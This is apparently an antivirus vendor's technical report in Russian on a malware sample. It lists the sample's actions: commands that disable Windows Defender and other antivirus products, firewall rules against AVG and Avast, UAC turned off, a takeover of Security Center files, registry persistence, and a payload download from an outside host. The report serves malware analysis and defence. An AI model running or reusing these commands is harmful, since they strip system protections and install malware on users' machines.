Техническая информация
Вредоносные функции
Для затруднения выявления своего присутствия в системе
блокирует запуск следующих системных утилит:
- Системный антивирус (Защитник Windows)
добавляет исключения антивируса:
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -DisableRealtimeMonitoring $true
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -SubmitSamplesConsent NeverSend
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "%WINDIR%\java"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "%WINDIR%\SysWOW64\java"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "<SYSTEM32>"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "%WINDIR%\SysWOW64"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "%WINDIR%\SysWOW64\xml"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "%LOCALAPPDATA%\CrashReports\Java"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "%LOCALAPPDATA%\Temp"
Запускает на исполнение
- '<SYSTEM32>\taskkill.exe' /im msseces.exe /f
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="F-Av" program="%ProgramFiles(x86)%\AVG\Antivirus\avgmfapx.exe" protocol=any dir=in enable=yes action=block profile=any
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="F-Av" program="%ProgramFiles(x86)%\AVG\Antivirus\avgmfapx.exe" protocol=any dir=out enable=yes action=block profile=any
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="F-Av" program="%ProgramFiles%\AVG\Antivirus\avgmfapx.exe" protocol=any dir=in enable=yes action=block profile=any
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="F-Av" program="%ProgramFiles%\AVG\Antivirus\avgmfapx.exe" protocol=any dir=out enable=yes action=block profile=any
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="F-Av" program="%ProgramFiles(x86)%\AVAST Software\Avast\setup\instup.exe" protocol=any dir=in enable=yes action=block profile=any
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="F-Av" program="%ProgramFiles(x86)%\AVAST Software\Avast\setup\instup.exe" protocol=any dir=out enable=yes action=block profile=any
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="F-Av" program="%ProgramFiles(x86)%\AVAST Software\Avast\AvastSvc.exe" protocol=any dir=out enable=yes action=block profile=any
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="F-Av" program="%ProgramFiles%\AVAST Software\Avast\avastui.exe" protocol=any dir=in enable=yes action=block profile=any
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="F-Av" program="%ProgramFiles(x86)%\AVAST Software\Avast\avastui.exe" protocol=any dir=in enable=yes action=block profile=any
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="F-Av" program="%ProgramFiles(x86)%\AVAST Software\Avast\avastui.exe" protocol=any dir=out enable=yes action=block profile=any
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="F-Av" program="%ProgramFiles%\AVAST Software\Avast\setup\instup.exe" protocol=any dir=out enable=yes action=block profile=any
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="F-Av" program="%ProgramFiles%\AVAST Software\Avast\setup\instup.exe" protocol=any dir=in enable=yes action=block profile=any
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="F-Av" program="%ProgramFiles%\AVAST Software\Avast\AvastSvc.exe" protocol=any dir=in enable=yes action=block profile=any
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="F-Av" program="%ProgramFiles%\AVAST Software\Avast\AvastSvc.exe" protocol=any dir=out enable=yes action=block profile=any
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="F-Av" program="%ProgramFiles%\AVG\Setup\avgsetupx.exe" protocol=any dir=out enable=yes action=block profile=any
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="F-Av" program="%ProgramFiles(x86)%\AVAST Software\Avast\AvastSvc.exe" protocol=any dir=in enable=yes action=block profile=any
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="F-Av" program="%ProgramFiles%\AVG\Setup\avgsetupx.exe" protocol=any dir=in enable=yes action=block profile=any
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="F-Av" program="%ProgramFiles%\AVG\avgsetupx.exe" protocol=any dir=in enable=yes action=block profile=any
- '<SYSTEM32>\taskkill.exe' /F /IM MSASCui.exe
- '<SYSTEM32>\taskkill.exe' /F /IM ByteFence.exe
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="F-Av" program="%ProgramFiles(x86)%\AVG\avgsetupx.exe" protocol=any dir=in enable=yes action=block profile=any
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="F-Av" program="%ProgramFiles(x86)%\AVG\avgsetupx.exe" protocol=any dir=out enable=yes action=block profile=any
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="F-Av" program="%ProgramFiles(x86)%\AVG\avgmfapx.exe" protocol=any dir=in enable=yes action=block profile=any
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="F-Av" program="%ProgramFiles(x86)%\AVG\avgmfapx.exe" protocol=any dir=out enable=yes action=block profile=any
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="F-Av" program="%ProgramFiles%\AVG\avgsetupx.exe" protocol=any dir=out enable=yes action=block profile=any
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="F-Av" program="%ProgramFiles%\AVG\Av\avgmfapx.exe" protocol=any dir=in enable=yes action=block profile=any
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="F-Av" program="%ProgramFiles%\AVG\avgmfapx.exe" protocol=any dir=in enable=yes action=block profile=any
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="F-Av" program="%ProgramFiles%\AVG\avgmfapx.exe" protocol=any dir=out enable=yes action=block profile=any
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="F-Av" program="%ProgramFiles(x86)%\AVG\Av\avgmfapx.exe" protocol=any dir=in enable=yes action=block profile=any
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="F-Av" program="%ProgramFiles(x86)%\AVG\Av\avgmfapx.exe" protocol=any dir=out enable=yes action=block profile=any
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="F-Av" program="%ProgramFiles(x86)%\AVG\Setup\avgsetupx.exe" protocol=any dir=in enable=yes action=block profile=any
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="F-Av" program="%ProgramFiles(x86)%\AVG\Setup\avgsetupx.exe" protocol=any dir=out enable=yes action=block profile=any
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="F-Av" program="%ProgramFiles%\AVG\Av\avgmfapx.exe" protocol=any dir=out enable=yes action=block profile=any
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="F-Av" program="%ProgramFiles%\AVAST Software\Avast\avastui.exe" protocol=any dir=out enable=yes action=block profile=any
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\2654.tmp\x86x64(c.o.s.r).bat
- <Текущая директория>\settings.kvdb-wal.rpm
- %ALLUSERSPROFILE%\avira\antivir desktop\config\avwin.ini
- %ALLUSERSPROFILE%\avg\av\db\exceptions.dat
- %ALLUSERSPROFILE%\avg\antivirus\exclusions.ini
- %ALLUSERSPROFILE%\avast software\avast\exclusions.ini
- %ALLUSERSPROFILE%\avast software\avast\exclusions.ini.obsolete
- %ALLUSERSPROFILE%\kaspersky lab\avp15.0.2\data\settings.kvdb-wal
- %ALLUSERSPROFILE%\kaspersky lab\ksde2.0.0\data\settings.kvdb-wal
- <Текущая директория>\acgst-v12#.deb
- %ALLUSERSPROFILE%\kaspersky lab\ksde3.0.0\data\settings.kvdb-wal
- %ALLUSERSPROFILE%\kaspersky lab\avp19.0.0\data\settings.kvdb-wal
- %ALLUSERSPROFILE%\kaspersky lab\avp20.0.0\data\settings.kvdb-wal
- %TEMP%\7c60.tmp\(acgst-v12debknci').bat
- <Текущая директория>\github.exe
- <Текущая директория>\github
- <Текущая директория>\acgst-v12-terkunci.exe
- <Текущая директория>\settings.kvdb-wal
- %ALLUSERSPROFILE%\kaspersky lab\avp18.0.0\data\settings.kvdb-wal
- %TEMP%\83a0.tmp\kvdb.bat
- %TEMP%\sysinfo-c.o.s.r-v9.txt
- <Текущая директория>\securesatudua-x64.exe
- <Текущая директория>\securesatudua-x32.exe
- <Текущая директория>\kvdb.x64.exe
- <Текущая директория>\kvdb.x32.exe
- <Текущая директория>\getapcc-v+.exe
- <Текущая директория>\acgst-12-qknci.exe
- <Текущая директория>\c.o.s.r-v20'#.dat
- nul
- <SYSTEM32>\avgexc.ini
- <SYSTEM32>\avwin.ini
- <SYSTEM32>\exceptions.dat
- <SYSTEM32>\exclusions.ini
- <SYSTEM32>\exclusions.ini.obsolete
- <SYSTEM32>\secure1.bat-del
- <SYSTEM32>\securesatudua.bat
- <SYSTEM32>\-.lnk
- %TEMP%\getapcc-v+.exe
- <Текущая директория>\acgst-v12.exe
Удаляет следующие файлы
- <Текущая директория>\securesatudua-x64.exe
- <Текущая директория>\getapcc-v+.exe
- <Текущая директория>\settings.kvdb-wal
- <Текущая директория>\settings.kvdb-wal.rpm
- %TEMP%\83a0.tmp\kvdb.bat
Перемещает следующие системные файлы
- <SYSTEM32>\wscapi.dll в <SYSTEM32>\wscapi.old
- <SYSTEM32>\wscsvc.dll в <SYSTEM32>\wscsvc.old
Другое
Ищет следующие окна
- ClassName: 'EDIT' WindowName: ''
- ClassName: '' WindowName: ''
Создает и запускает на исполнение
- '<Текущая директория>\securesatudua-x64.exe'
- '<Текущая директория>\kvdb.x64.exe'
- '<Текущая директория>\acgst-12-qknci.exe'
- '<Текущая директория>\github.exe' 1 acgst-v12-terkunci.exe acgst-v12.exe @@AcgsTtwelve@@#
- '<Текущая директория>\acgst-v12.exe'
- '%TEMP%\getapcc-v+.exe' --user-agent="Iphone Firefox/3.3.3" -N --tries=77 --read-timeout=300 http://ipm.biz.id/getapcc++/default.php
Запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\2654.tmp\x86x64(c.o.s.r).bat" " (со скрытым окном)
- '<SYSTEM32>\sc.exe' stop "rtop"
- '<SYSTEM32>\sc.exe' config "rtop" start= disabled
- '<SYSTEM32>\sc.exe' delete "rtop"
- '<SYSTEM32>\reg.exe' delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v MSC
- '<SYSTEM32>\reg.exe' add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 00000000 /f
- '<SYSTEM32>\reg.exe' add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v AutoShareWKS /t REG_DWORD /d 00000001 /f
- '<SYSTEM32>\msiexec.exe' /x {8F023021-A7EB-45D3-9269-D65264C81729} /quiet
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -ThreatIDDefaultAction_Actions NoAction
- '<SYSTEM32>\icacls.exe' <SYSTEM32>\wscui.dll /grant administrators:F
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\7C60.tmp\(acgst-v12debknci').bat" " (со скрытым окном)
- '%WINDIR%\syswow64\reg.exe' delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v SmartAudioFilterAgent /f
- '%WINDIR%\syswow64\reg.exe' delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32 /v SmartAudioFilterAgent /f
- '%WINDIR%\syswow64\reg.exe' delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v SmartAudioFilterAgent /f /reg:64
- '%WINDIR%\syswow64\reg.exe' delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32 /v SmartAudioFilterAgent /f /reg:64
- '%WINDIR%\syswow64\reg.exe' add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v SmartAudioFilterAgent /t REG_SZ /d %WINDIR%\java\audiocheck.exe /f
- '%WINDIR%\syswow64\reg.exe' delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v WindowsTask /f
- '%WINDIR%\syswow64\reg.exe' delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32 /v WindowsTask /f
- '%WINDIR%\syswow64\reg.exe' delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v WindowsTask /f /reg:64
- '<SYSTEM32>\sc.exe' stop "MBAMService"
- '<SYSTEM32>\sc.exe' config "MBAMService" start= disabled
- '<SYSTEM32>\sc.exe' config WerSvc start= disabled
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\83A0.tmp\kvdb.bat" " (со скрытым окном)
- '<SYSTEM32>\sc.exe' stop WerSvc
- '%WINDIR%\syswow64\findstr.exe' /B /C:"OS Name" /C:"System Type" /C:"Host Name"
- '%WINDIR%\syswow64\cmd.exe' /S /D /c" type "%TEMP%\sysinfo-c.o.s.r-v9.txt" "
- '%WINDIR%\syswow64\findstr.exe' "x64-based"
- '<SYSTEM32>\cmd.exe' /C "<SYSTEM32>\securesatudua.bat"
- '<SYSTEM32>\takeown.exe' /f <SYSTEM32>\wscapi.dll
- '<SYSTEM32>\icacls.exe' <SYSTEM32>\wscapi.dll /grant administrators:F
- '<SYSTEM32>\takeown.exe' /f <SYSTEM32>\wscsvc.dll
- '<SYSTEM32>\icacls.exe' <SYSTEM32>\wscsvc.dll /grant administrators:F
- '%WINDIR%\syswow64\reg.exe' delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32 /v WindowsTask /f /reg:64
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\83EE.tmp\acgst-12В®.bat" " (со скрытым окном)
- '<SYSTEM32>\takeown.exe' /f <SYSTEM32>\wscui.cpl
- '<SYSTEM32>\sc.exe' stop "avast! Antivirus"
- '<SYSTEM32>\sc.exe' delete "avast! Antivirus"
- '<SYSTEM32>\sc.exe' stop "NanoServiceMain"
- '<SYSTEM32>\sc.exe' delete "NanoServiceMain"
- '<SYSTEM32>\sc.exe' stop newserv
- '<SYSTEM32>\sc.exe' delete newserv
- '<SYSTEM32>\sc.exe' stop UxSms
- '<SYSTEM32>\sc.exe' delete UxSms
- '%WINDIR%\syswow64\systeminfo.exe'
- '<SYSTEM32>\sc.exe' config WinDefend start= disabled
- '%WINDIR%\syswow64\reg.exe' add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v WindowsTask /t REG_SZ /d %WINDIR%\java\taskhosts.exe /f
